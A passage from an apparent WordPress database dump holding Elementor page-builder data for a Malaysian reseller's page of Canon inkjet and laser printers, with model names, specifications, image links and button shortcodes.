width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7080,3325,'_wp_page_template','template-fullwidth.php'),(7081,3325,'_elementor_edit_mode','builder'),(7082,3325,'_elementor_template_type','post'),(7083,3325,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ba38c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9b84d1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"189f9a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"df0825f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"31\",\"right\":\"31\",\"bottom\":\"31\",\"left\":\"31\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"89b9be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"11\",\"right\":\"11\",\"bottom\":\"11\",\"left\":\"11\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f95d9d7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23b0d26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"137f63f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"28\",\"right\":\"28\",\"bottom\":\"28\",\"left\":\"28\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e0baf05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c3f6907\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p>\\n\\n<\\/div>\\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f2ce8e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a9b750\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p>\\n\\n<\\/div>\\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2fabcd2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0a62d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\\n\\n<\\/div>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>First Print Out Time (A4): Approx. 6.5 sec<\\/li>\\n \\t<li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n \\t<li>Mobile Printing<\\/li>\\n<\\/ul><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"dfd3898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n\\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 43ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li>\\n \\t<li>FPOT: 6.2secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 2,300 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f0eb648\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS 